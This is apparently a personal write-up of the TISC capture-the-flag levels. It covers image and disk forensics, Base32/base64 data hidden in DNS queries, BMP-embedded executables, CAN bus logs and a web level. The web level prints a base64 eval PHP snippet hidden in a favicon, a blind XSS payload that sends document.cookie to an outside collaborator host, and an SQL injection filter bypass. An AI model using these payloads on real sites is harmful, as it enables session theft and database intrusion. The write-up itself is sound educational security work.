This is a generic picture. What is the modify time of this photograph?
Submit your flag in the following format: TISC{YYYY:MM:DD HH:MM:SS}
file2.jpg
exiftool solved this in no time.
TISC{2021:10:30 03:40:49}
Part 3
Domains: Forensics, Cryptography
Nothing unusual about the Singapore logo right?
Submit your flag in the following format: TISC{ANSWER}
file3.jpg
The first appearance of the cryptography domain! I opened the file in the 010 Editor hex editor which highlighted an anomalous data blob at the end of the file.
The PK magic bytes identified this blob as a zip file. I extracted it with binwalk -e file3.jpg, which revealed another image file, picture_with_text.jpg. I opened it in 010 Editor and spotted some garbage bytes at the start of the file.
NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE looked like a simple text cipher. I popped it into CyberChef and quickly discovered that it was ROT13 “encryption”.
TISC{APPLECARROTPEAR}
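For reference, the same decoding is a one-liner with Python's built-in rot13 codec:

```python
import codecs

ciphertext = "NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE"
print(codecs.decode(ciphertext, "rot13"))
# ANSWER TO THIS CHALLENGE IS HERE APPLECARROTPEAR
```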
Part 4
Domains: Forensics
Excellent! Now that you have show your capabilities, CSIT SOC team have given you an .OVA virtual image in investigating a snapshot of a machine that has been compromised by PALINDROME. What can you uncover from the image?
Once you download the VM, use this free flag TISC{Yes, I've got this.} to unlock challenge 4 – 10.
https://transfer.ttyusb.dev/I6aQoOSuUuAoIIaqMWWkCcKyOk/windows10.ova
Check MD5 hash: c5b401cce9a07a37a6571ebe5d4c0a48
For guide on how to import the ova file into VirtualBox, please follow the VM importing guide attached.
Please download and install Virtualbox ver 6.1.26 instead of ver 6.1.28, as there has been reports of errors when trying to install the Win 10 VM image.
This challenge contained six flags but no rollercoasters. I naively imported the VM into Virtualbox and got to work.
What is the name of the user?
Submit your flag in the format: TISC{name}.
What is whoami?
TISC{adam}
Which time was the user's most recent logon? Convert it UTC before submitting.
Submit your flag in the UTC format: TISC{DD/MM/YYYY HH:MM:SS}.
I experienced my first facepalm moment of the competition (there would be many more to come). The most recent logon time got reset after I logged into the VM, so it was time to download Autopsy.
After Autopsy imported and processed the OVA file, I found the most recent logon time under OS Accounts > adam > Last Login and converted the timezone to UTC.
TISC{17/06/2021 02:41:37}
A 7z archive was deleted, what is the value of the file CRC32 hash that is inside the 7z archive?
Submit your flag in this format: TISC{CRC32 hash in upper case}.
I found the deleted archive at Data Artifacts > Recycle Bin and generated the CRC32 hash with 7-Zip.
TISC{040E23DA}
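If 7-Zip is not at hand, the same CRC32 can be computed in the flag's upper-case hex form with Python's zlib (the input bytes below are placeholders, not the actual extracted file):

```python
import zlib

def crc32_upper_hex(data: bytes) -> str:
    # Mask to an unsigned 32-bit value, then render as 8 upper-case hex digits
    return f"{zlib.crc32(data) & 0xFFFFFFFF:08X}"

print(crc32_upper_hex(b"placeholder file contents"))
```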
Question1: How many users have an RID of 1000 or above on the machine?
Question2: What is the account name for RID of 501?
Question3: What is the account name for RID of 503?
Submit your flag in this format: TISC{Answer1-Answer2-Answer3}. Use the same case for the Answers as you found them.
I got all of the answers under OS Accounts although I was briefly confused by the system users.
TISC{1-Guest-DefaultAccount}
Question1: How many times did the user visit https://www.csit.gov.sg/about-csit/who-we-are ?
Question2: How many times did the user visit https://www.facebook.com ?
Question3: How many times did the user visit https://www.live.com ?
Submit your flag in this format: TISC{ANSWER1-ANSWER2-ANSWER3}.
Data Artifacts > Web History
TISC{2-0-0}
A device with the drive letter “Z” was connected as a shared folder in VirtualBox. What was the label of the volume? Perhaps the registry can tell us the “connected” drive?
Submit your flag in this format: TISC{label of volume}.
I found this a little difficult. I resorted to adding another shared folder to the VM, then searching for the label name in Registry Editor to figure out which registry key controlled the volume labels. This led me to the registry path Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2, which contained all the volume labels.
TISC{vm-shared}
A file with SHA1 0D97DBDBA2D35C37F434538E4DFAA06FCCC18A13 is in the VM… somewhere. What is the original name of the file that is of interest?
Submit your flag in this format: TISC{original name of file with correct file extension}.
Since Autopsy only supported SHA256 and MD5 hashes, I resorted to guessing that it was one of the files under Data Artifacts > Recent Documents. I extracted all of them and ran Get-FileHash -Algorithm SHA1 *. otter-singapore.lnk, which used to point to otter-singapore.jpg, matched the SHA1 hash.
TISC{otter-singapore.jpg}
Level 2: Dee Na Saw as a need
Domain: Network Forensics
We have detected and captured a stream of anomalous DNS network traffic sent out from one of the PALINDROME compromised servers. None of the domain names found are active. Either PALINDROME had shut them down or there's more to it than it seems.
This level contains 2 flags and both flags can be found independently from the same pcap file as attached here.
Flag 1 will be in this format, TISC{16 characters}.
Flag 2 will be in this format, TISC{17 characters}.
traffic.pcap
As a newbie to steganography, I felt that this level was the most “CTF-y” and actually got stuck for two days hunting flag 1 and ragequit for a while. Fortunately, I managed to get it after cooling off.
Flag 2
traffic.pcap consisted of a short series of DNS query responses.
A few anomalies stood out to me:
- The domain names clearly contained some kind of exfiltration data and matched the format d33d<9 hex chars>.toptenspot.net.
- The Time to Live (TTL) values constantly changed, which should not be the case with a typical DNS server.
- The serial numbers also kept changing.
For the domain names, I noticed that the first two hex chars were always numeric, e.g. 10, 11, 12. I extracted the hex chars with scapy and tried hex-decoding them, but it only produced gibberish. After fiddling around with a few variations such as XORing consecutive bytes, I came across this CTF writeup that described Base32 encoding of data in DNS query names. Base32 encoding used a similar charset to hex numbers. I tried Base32-decoding the “hex chars” with CyberChef and immediately spotted a few interesting outputs such as <NON-ASCII CHARS>ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghij. After playing around with the offsets, I realised that the first two (numeric) characters were bad bytes, while the rest of the characters made up a valid Base32 string.
I automated the decoding routine with a quick script.
from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')
encoded = ''
for packet in dns_packets:
    if packet.haslayer(DNS):
        # Skip 'd33d' plus the two numeric bad bytes, keep the 7 Base32 chars
        encoded += packet[DNS].qd.qname[6:13].decode('utf-8')
# Truncate to a multiple of 8 characters so b32decode accepts the input
encoded = encoded[:len(encoded) - (len(encoded) % 8)]
decoded = base64.b32decode(encoded).decode('utf-8')
print(decoded)
This produced a bunch of lorem ipsum text along with the second flag.
TISC{n3vEr_0dd_0r_Ev3n}
Flag 1
With the first anomalous property solved, I focused on the TTLs and serial numbers, wasting many hours chasing what eventually turned out to be a red herring. The TTLs and serial numbers generally matched a pattern – Serial number + TTL = Unix timestamp – that made it seem like I was on the right path. After many fruitless hours spent mutating these values in increasingly insane permutations, I gave up and took my break.
When I returned, I went back to basics and considered the numeric “bad bytes” from the DNS domain names. I decided to check the range of these values. They went from 01 to 64... could it be? I transposed the numbers to the base64 alphabet, then base64-decoded them... yep, it was a DOCX file.
Pictured below is the moment the challenge creator thought of the TTL red herring.
Moving on, I extracted the DOCX file with scapy.
from scapy.all import *
from scapy.layers.dns import DNS
import base64

dns_packets = rdpcap('traffic.pcap')
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
encoded = ''
for packet in dns_packets:
    if packet.haslayer(DNS):
        # The two "bad bytes" range from 01 to 64: a 1-based index into the base64 alphabet
        encoded += alphabet[int(packet[DNS].qd.qname[4:6].decode('utf-8')) - 1]
decoded = base64.b64decode(encoded + '==')
with open('output.docx', 'wb') as file:
    file.write(decoded)
The word document contained the pretty obvious clue now you see me, what you seek is within. Since DOCX files are actually ZIP files in disguise, I unzipped the DOCX and grepped the files for the flag format TISC{. I found what I was looking for in word/theme/theme1.xml.
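Since a DOCX is just a ZIP archive, the unzip-and-grep step can also be done in a few lines of Python (a sketch; find_flag_in_docx is a hypothetical helper, not part of my original solution):

```python
import zipfile

def find_flag_in_docx(path, marker=b"TISC{"):
    # A DOCX is a ZIP archive: scan every member for the flag marker
    with zipfile.ZipFile(path) as z:
        for name in z.namelist():
            if marker in z.read(name):
                return name
    return None
```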
TISC{1iv3_n0t_0n_3vi1}
Level 3: Needle in a Greystack
Domains: Reverse Engineering
An attack was detected on an internal network that blocked off all types of executable files. How did this happen?
Upon further investigations, we recovered these 2 grey-scale images. What could they be?
1.bmp
2.bmp
I opened both files in 010 Editor and noticed that both 1.bmp and 2.bmp embedded data in the BMP pixel colour bytes in reverse order. 1.bmp contained a Windows executable while 2.bmp contained simple ASCII text.
I extracted them with a simple Python script.
# Read 148-byte chunks from the end of the file backwards,
# discarding the final 3 bytes of each chunk
with open("1.bmp", "rb") as bmp_1, open("1.exe", "wb") as out_file:
    data = bmp_1.read()
    output = data[-148:][:-3]
    for i in range(1, 145):
        output += data[-((i + 1) * 148):-(i * 148)][:-3]
    out_file.write(output)

# Same idea for 2.bmp, with 100-byte chunks and 1 discarded byte each
with open("2.bmp", "rb") as bmp_2, open("2.txt", "wb") as out_file:
    data = bmp_2.read()
    output = data[-100:][:-1]
    for i in range(1, 99):
        output += data[-((i + 1) * 100):-(i * 100)][:-1]
    out_file.write(output)
Running 1.exe, I received the following output:
> .\1.exe
HELLO WORLD
flag{THIS_IS_NOT_A_FLAG}
Digging deeper, I decompiled the executable with IDA and noticed that the main function checked for a .txt file in the first argument.
puts("HELLO WORLD");
if ( argc < 2 )
goto LABEL_34;
v3 = argv[1];
v4 = strrchr(v3, 46);
if ( !v4 || v4 == v3 )
v5 = (const char *)&unk_40575A;
else
v5 = v4 + 1;
v6 = strcmp("txt", v5);
if ( v6 )
v6 = v6 < 0 ? -1 : 1;
if ( v6 )
{
LABEL_34:
puts("flag{THIS_IS_NOT_A_FLAG}");
return 1;
}
fopen_s(&Stream, argv[1], "rb");
v7 = (void (__cdecl *)(FILE *, int, int))fseek;
if ( Stream )
{
fseek(Stream, 0, 2);
v8 = ftell(Stream);
v23 = v8 >> 31;
v24 = v8;
fclose(Stream);
}
I tested this with a random text file, which yielded the following output.
> .\1.exe .\2.txt
HELLO WORLD
Almost There!!
Looking further down the pseudocode for main, I noticed that it called a function that VirtualAlloced some memory, copied data into it, then ran LoadLibraryA. Since Almost There!! did not appear as a string in 1.exe, I suspected that it came from the dynamically loaded library.
I set a breakpoint at the memcpy and ran the IDA debugger. Checking the arguments to memcpy at the breakpoint, I confirmed that it copied an executable file that included the magic bytes MZ followed by This program cannot be run in DOS mode.
Now I needed to dump this data. I manually figured out the size of the file by checking for the Application Manifest XML text that appeared at the end of the source buffer. Next, I dumped it in WinDbg with .writemem b.exe ebx L2600.
The executable turned out to be a DLL that contained the decoding routine in the dllmain_dispatch function, which was executed every time 1.exe loaded it with LoadLibraryA.
The DLL decompiled to pseudocode which I identified as the RC4 key-scheduling algorithm (KSA) due to the 256-iteration loop.
if ( Block )
{
v4 = strcmp(Block, "Words of the wise may open many locks in life.");
if ( v4 )
v4 = v4 < 0 ? -1 : 1;
if ( !v4 )
puts("*Wink wink*");
}
memset(v18, 0, 0xFFu);
for ( i = 0; i < 256; ++i ) // RC4 Key Scheduling Algorithm
*((_BYTE *)&Stream[1] + i) = i;
v6 = 0;
Stream[0] = 0;
do
{
v7 = *((_BYTE *)&Stream[1] + v6);
v8 = (FILE *)(unsigned __int8)(LOBYTE(Stream[0]) + Block[v6 % 0xEu] + v7);
Stream[0] = v8;
*((_BYTE *)&Stream[1] + v6++) = *((_BYTE *)&Stream[1] + (_DWORD)v8);
*((_BYTE *)&Stream[1] + (_DWORD)v8) = v7;
}
The pseudocode contained two more important tidbits of information. Firstly, “Words of the wise may open many locks in life” looked like a hint. Secondly, the KSA loop used 0xE as the modulus, telling me that the RC4 key was 14 bytes long.
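For reference, the loop the decompiler recovered corresponds to the textbook KSA below; the % 0xE in the pseudocode is the i % len(key) term, which is what leaks the key length:

```python
def rc4_ksa(key: bytes) -> list:
    # Standard RC4 key scheduling: initialise S to the identity
    # permutation, then swap entries driven by the key bytes
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256  # len(key) == 0xE here
        S[i], S[j] = S[j], S[i]
    return S
```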
At first, I fell down a rabbit hole trying to guess the key. Given the name of the challenge and Words of the wise, I thought it had something to do with Gandalf from Lord of the Rings and tried all kinds of phrases associated with him, including youwillnotpass. After a long time, I returned to my senses and realised that the key probably existed in the second file I had extracted earlier. It contained a huge list of words, including rubywise – this was probably what the “Words of the wise” hint was referring to.
I brute forced the keys with a quick Python script.
import subprocess

with open('keys.txt') as file:
    lines = [line.rstrip() for line in file.readlines()]

for line in lines:
    # Try each word as the candidate key, checking the output for the flag marker
    with open('key.txt', 'w') as key:
        key.write(line)
    result = subprocess.run([".\\1.exe", ".\\2.txt"], capture_output=True).stdout
    if b'TISC' in result:
        print(line)
        print(result)
TISC{21232f297a57a5a743894a0e4a801fc3}
Level 4: The Magician's Den
Domains: Web Pentesting
One day, the admin of Apple Story Pte Ltd received an anonymous email.
===
Dear admins of Apple Story,
We are PALINDROME.
We have took control over your system and stolen your secret formula!
Do not fear for we are only after the money.
Pay us our demand and we will be gone.
For starters, we have denied all controls from you.
We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 dec 2021.
Do not contact the police or seek for help.
Failure to do so and the plant is gone.
We planted a monitoring kit so do not test us.
Remember 1 BTC by 31 dec 2021 and we will be gone.
Muahahahaha.
Regards,
PALINDROME
===
Management have just one instruction. Retrieve the encryption key before the deadline and solve this.
http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719
Note: Payloads uploaded will be deleted every 30 minutes.
Finally, a web challenge! The website featured a ransom note and a link to a payment page.
The challenge came with a free hint: “What are some iconic techniques that the actor PALINDROME mimicked Magecart to evade detection?” Based on this, I researched Magecart's tactics, techniques, and procedures (TTPs) and found out that the threat actor hid malicious payloads in image files. I checked each of the loaded images and noticed that favicon.ico contained the following PHP code: eval(base64_decode('JGNoPWN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwiaHR0cDovL3MwcHE2c2xmYXVud2J0bXlzZzYyeXptb2RkYXc3cHBqLmN0Zi5zZzoxODkyNi94Y3Zsb3N4Z2J0ZmNvZm92eXdieGRhd3JlZ2pienF0YS5waHAiKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9QT1NULDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1BPU1RGSUVMRFMsIjE0YzRiMDZiODI0ZWM1OTMyMzkzNjI1MTdmNTM4YjI5PUhpJTIwZnJvbSUyMHNjYWRhIik7JHNlcnZlcl9vdXRwdXQ9Y3VybF9leGVjKCRjaCk7'));. The base64 string decoded to:
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://<DOMAIN>:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);
This PHP code sent the following HTTP request:
POST /xcvlosxgbtfcofovywbxdawregjbzqta.php HTTP/1.1
Host: <DOMAIN>:18926
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
14c4b06b824ec593239362517f538b29=Hi%20from%20scada
Which returned the following response:
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 05:50:11 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8
New record created successfully in data/9bcd278b611772b366155e078d529145.html
The server created an HTML file from my input. I did a quick check for SQL injection (nothing), then moved on to the next most likely vulnerability – a blind cross-site scripting (XSS) attack. Instead of Hi%20from%20scada, I entered <img src="http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net" />. After a few minutes, I got a pingback!
GET / HTTP/1.1
Referer: http://magicians-den-web/data/9bcd278b611772b366155e078d529145.html
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net
I also realised that the PHP code sent the POST request to a different website at http://<DOMAIN>:18926/. The website included a “Latest sample data” page containing the HTML files created by the POST request, which helped me debug my payloads.
Usually, XSS CTF challenges featured data exfiltration via the victim's browser. At first, I suspected that because the victim's User-Agent PhantomJS/2.1.1 suffered from a known local file disclosure vulnerability, I was meant to leak /etc/passwd. However, after multiple attempts, I got nowhere, probably because the victim accessed the XSS payload from an http:// URL rather than a file:// URI that could bypass Cross-Origin Resource Sharing (CORS) protections.
Going back to the drawing board, I decided to perform some directory busting with ffuf and discovered that a login page existed at http://<DOMAIN>:18926/login.php.
Unfortunately, the signup was disabled, but since the PHPSESSID cookie controlled the user's session, I found the way forward: I needed to leak the admin's session cookie using the blind XSS. I modified my payload to <script>document.body.appendChild(document.createElement("img")).src='http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net?'%2bdocument.cookie</script> and received a pingback at /?PHPSESSID=64f15ffeb7a191812bddfb9a855e0ffb.
After adding the session cookie, I browsed to the login page and got redirected to http://<DOMAIN>:18926/landing_admin.php.
The page listed actions taken by targets and allowed me to filter the results by isALIVE or isDEAD. When I changed the filter, the page sent the following HTTP request:
POST /landing_admin.php HTTP/1.1
Host: <DOMAIN>:18926
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<DOMAIN>:18926
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<DOMAIN>:18926/landing_admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e9b94a5a71d62d9171130ad5890f38ef
Connection: close
filter=isALIVE
Other than the filtered actions, the response included the text Filter applied: <VALUE OF FILTER PARAM>. Switching to the isDEAD filter returned the actions MaybeMessingAroundTheFilterWillHelp? and ButDoYouKnowHow?, hinting at an SQL injection.
I confirmed that the POST /landing_admin.php request was vulnerable to SQL injection using isomorphic SQL statements; adding a simple ' to filter=isALIVE caused the server to omit the Filter applied message, and adding '' restored it. However, jumping straight to ' OR '1'='1 failed. Puzzled, I continued testing several payloads and eventually noticed that certain characters were sanitized because they never appeared in the Filter applied message. By fuzzing all possible URL-encoded ASCII characters, I reconstructed the blacklist !"$%&*+,-./:;<=>?@[]^_`{|}~, which only left the special characters #'(). Additionally, I found out that any filter parameter longer than 7 characters always failed.
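A per-character probe along these lines could reconstruct the blacklist automatically (a sketch rather than my exact fuzzing setup; probe_blacklist is hypothetical, and the HTTP transport is passed in as a function so the filtering logic is testable offline):

```python
import string

def probe_blacklist(post_filter):
    """Find which special characters never survive into the
    'Filter applied: <value>' echo. post_filter(value) should POST
    filter=<value> to landing_admin.php and return the response body."""
    specials = [c for c in string.printable if not c.isalnum() and not c.isspace()]
    blacklisted = set()
    for c in specials:
        body = post_filter(c)  # a single char stays under the 7-char limit
        if "Filter applied: " + c not in body:
            blacklisted.add(c)
    return blacklisted
```

With requests, post_filter could be something like lambda v: requests.post(url, data={'filter': v}, cookies={'PHPSESSID': sid}).text, where url and sid are the admin endpoint and stolen session ID.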
Since the injected SQL statement probably looked something like SELECT * from actions WHERE status='<PAYLOAD>', I reasoned that one possible valid payload was 'OR(1)#, creating the final statement SELECT * from actions WHERE status=''OR(1)#'. This neatly dumped all possible actions while commenting out the extra '. Thankfully, the payload worked and the response included the flag as one of the actions.
TISC{H0P3_YOu_eNJ0Y-1t}
Level 5: Need for Speed
Domains: Binary Manipulation, IoT Analytics
We have intercepted some instructions sent to an autonomous bomb truck used by PALINDROME. However, it seems to be just a BMP file of a route to the Istana!
Analyze the file provided and uncover PALINDROME's instructions. Find a way to kill the operation before it is too late.
Ensure the md5 checksum of the given file matches the following before starting: 26dc6d1a8659594cdd6e504327c55799
Submit your flag in the format: TISC{flag found}.
Note: The flag found in this challenge is not in the TISC{...} format. To assist in verifying if you have obtained the flag, the md5 checksum of the flag is: d6808584f9f72d12096a9ca865924799.
ATTACHED FILES
route.bmp
This steganography challenge stumped many participants. On the surface, route.bmp looked like a simple screenshot of a map.
Using stegsolve, I noticed interesting outputs when I applied the plane 0 filter on either red, green, or blue values.
The top half of the image resembled static instead of the expected black-and-white outline of the original image. While researching more image steganography techniques, I came across another CTF writeup which featured similar “static” generated by stegsolve. The writeup described how the image hid the data in the least significant bits of each pixel's RGB values. I applied the script from the writeup to extract the data but encountered a slight corruption. Although the first few bytes 37 7A C2 BC C2 AF 27 1C almost matched the magic bytes of a 7-Zip file 37 7A BC AF 27 1C, the extra C2 bytes got in the way of a proper decoding.
I decided to compare the expected binary output against the real output of the script.
Expected: 00110111 01111010 10111100 10101111 00100111 00011100 # 37 7A BC AF 27 1C
Real: 00110111001111011010001011100010000111101011010011100 # 37 3d a2 e2 1e b4 1c
After reading the writeup closely, I realised that the script correctly skipped every 9th bit but converted the bits to bytes too early. I fixed this bug to get a working decoder.
#!/usr/bin/env python
from PIL import Image
import sys

# Trim every 9th bit
def trim_bit_9(b):
    trimmed = ''
    while len(b) != 0:
        trimmed += b[:8]
        b = b[9:]
    return trimmed

# Load image data
img = Image.open(sys.argv[1])
w, h = img.size
pixels = img.load()
binary = ''
for y in range(h):
    for x in range(w):
        # Pull out the LSBs of this pixel in RGB order
        binary += ''.join([str(n & 1) for n in pixels[x, y]])

trimmed = trim_bit_9(binary)
with open('out.7z', 'wb') as file:
    file.write(bytes(int(trimmed[i : i + 8], 2) for i in range(0, len(trimmed), 8)))
The extracted 7-Zip file contained two files: update.log and candump.log.
update.log contained the following text:
see turn signals for updated abort code :)
- P4lindr0me
Meanwhile, candump.log was a huge file that contained lines like this:
(1623740188.969099) vcan0 136#000200000000002A
(1623740188.969107) vcan0 13A#0000000000000028
(1623740188.969109) vcan0 13F#000000050000002E
(1623740188.969112) vcan0 17C#0000000010000021
(1623740225.790964) vcan0 324#7465000000000E1A
(1623740225.790966) vcan0 37C#FD00FD00097F001A
(1623740225.790968) vcan0 039#0039
(1623740225.792217) vcan0 183#0000000C0000102D
(1623740225.792231) vcan0 143#6B6B00E0
(1623740225.794607) vcan0 095#800007F400000017
What was I looking at? After a bit of Googling, I found out that candump was a tool to dump Controller Area Network (CAN) bus traffic. CAN itself is a network protocol used by vehicles. By searching for some of the lines in candump.log, I discovered a sample CAN log generated by ICSim. After doing some more research on the CAN protocol, I deduced that each line in the CAN dump matched the format (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>.
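That format can be captured with a small parser (a sketch; the regex simply mirrors the field layout deduced above):

```python
import re

# (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>
CAN_LINE = re.compile(
    r"\((?P<ts>[\d.]+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-F]+)#(?P<data>[0-9A-F]*)"
)

def parse_candump_line(line):
    # Returns (timestamp, interface, instruction id, instruction data),
    # or None if the line does not match the candump format
    m = CAN_LINE.match(line.strip())
    if m is None:
        return None
    return float(m["ts"]), m["iface"], m["id"], m["data"]
```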
Based on the “see turn signals” clue, I needed to find the CAN instruction ID that matched the “turn signal” instruction. The CAN instruction data for turn signals probably contained the flag. I reviewed the source code of ICSim and saw that ICSim set the turn signal ID to either a default constant or some randomised value:
#define DEFAULT_SIGNAL_ID 392 // 0x188
...
signal_id = DEFAULT_SIGNAL_ID;
speed_id = DEFAULT_SPEED_ID;
if (randomize || seed) {
    if(randomize) seed = time(NULL);
    srand(seed);
    door_id = (rand() % 2046) + 1;
    signal_id = (rand() % 2046) + 1;
Sadly, since none of the CAN dump lines contained the 188 instruction ID, I knew that the turn signal instruction ID had been randomised.
Based on the code and an ICSim tutorial, I also knew that the data values for the turn signal instruction could be 00 (both off), 01 (left on only), 02 (right on only), or 03 (both on). As such, I attempted to filter out all CAN instruction IDs that had at most 4 unique data values in candump.log. The instruction ID 40C looked promising because it only had the following unique data values: 40C: ['0000000004000013', '014A484D46413325', '0236323239533039', '033133383439000D']. However, despite spending hours hex-decoding the values, XORing them, and so on, I failed to retrieve any usable data.
After wasting much time on this rabbit hole, I re-read the source code for sending a turn signal in ICSim.
void send_turn_signal() {
    memset(&cf, 0, sizeof(cf));
    cf.can_id = signal_id;
    cf.len = signal_len;
    cf.data[signal_pos] = signal_state;
    if(signal_pos) randomize_pkt(0, signal_pos);
    if(signal_len != signal_pos + 1) randomize_pkt(signal_pos+1, signal_len);
    send_pkt(CAN_MTU);
}
I noticed my mistake: the send_turn_signal function set only one byte in the CAN message data to the signal state byte, then randomised the rest of the data bytes. This meant that the turn signals would have far more than four possible unique data values! Instead, I should have filtered the CAN dump for turn signal IDs whose data values always included either 00, 01, 02, or 03 in a fixed position. I quickly wrote a new script to do this.
can_combinations = dict()
can_count = dict()

with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id not in can_combinations:
            can_combinations[can_id] = [can_data]
        elif can_data not in can_combinations[can_id]:
            can_combinations[can_id].append(can_data)
        if can_id not in can_count:
            can_count[can_id] = 1
        else:
            can_count[can_id] += 1

for can_id in can_combinations:
    if all(('01' in data or '02' in data or '03' in data or '00' in data) for data in can_combinations[can_id]):
        print("{} {}: {}".format(can_id, can_count[can_id], can_combinations[can_id]))
Out of the possible filtered CAN IDs, 0C7 also looked promising because some of the data values contained ASCII characters when hex-decoded.
0C7: ['00006c88000000', '0E003100000011', '00006664000000', '00003369000066', '00E75f00D30000', '3A0931E20000E0', '07003500000000', '00005fA1000038', '00007782600000', '3521683F00016C', '00003400000005', '00003700000100', '4F005f00000000', '00006802000100', '00003483000000', 'B900702D000100', '00007006000000', '00B63300000117', 'F8786e000C00D6', '0092359B000100', '90005f77F80000', 'B3457700000100', '00006800000030', 'C9F13300AA0100', '00B56e00000000', '00005f98AB0186', '770079003800D0', '0000305D000100', 'F3427500000064', '00002700000100', 'A0007200460032', '00003312000100', 'C2005f000000E2', '00006200790100', '00007500000000', '00003500000000', '004A7900000000', '00005f00000000', '00006d33000000', '000034000000BF', '00136b0000005C', '00F63100000000', '00006e00AA0099', '15003600000000', '7B005fD6000000', 'BC003020000000', 'B7003700000000', '0000680000006C', '00003300310000', '50007200A50000', '00005f00A60000', '00E67000A200A2', '77006c00450059', '89003400000000', '59006e2AE500D1', '00E23500F80000', '00912eC2B40000', '00002d00000100', '003E6a007B0060', '00005f00F70132', '0000304F000000', '00FB5f00000100', '44576800000000', '00005f00000193', 'FD006eDE450000', '00895f00900100', '00006c00910000', '00005fDDD10000', '00003300000200', '00CA5f00CC0000', 'E4FB6e00000000', '00005f00770000', '00006e00000000', '00005f00810000', '00003049940000', '00F95f003600D4', '6E7B6e936C0051']
After a lot of manual copying and pasting, I found that these ASCII characters appeared in the third byte of each instruction's data. Based on this hunch, I wrote another short script to extract and decode these bytes.
encoded = ''
with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id == '0C7':
            # The flag character sits in the third data byte (hex chars 4-6)
            encoded += can_data[4:6]
print(bytes.fromhex(encoded).decode('utf-8'))
This produced l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n, which matched the checksum d6808584f9f72d12096a9ca865924799.
TISC{l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n}
Level 6: Knock Knock, Who's There
Domains: Network Forensics, Reverse Engineering
Traffic capture suggests that a server used to store OTP passwords for PALINDROME has been found. Decipher the packets and figure out a way to get in. Move quick, time is of essence.
https://transfer.ttyusb.dev/s4is2/traffic_capture.pcapng
Server at 128.199.211.243
Note: The challenge instance may be reset periodically so do save a copy of any files you might need on your machine.
I was halfway there, but I faced the most mind-bending level yet. I downloaded the massive 614 MB PCAP file containing all kinds of traffic, including SSH, SMB, HTTP, and more. Based on the title of the level and “time is of essence” in the description, I suspected that the challenge involved port knocking. I needed to find the port knocking sequence – the needle in the haystack – and thereafter use it to access the server at 128.199.211.243. I ran a full nmap scan of the server which returned zero open ports – another strong hint that port knocking was the solution.
To start off, I scanned the PCAP with VirusTotal and Suricata, both of which flagged malicious traffic.
08/26/2021-19:47:30.560000 [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000 [**] [1:2008715:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
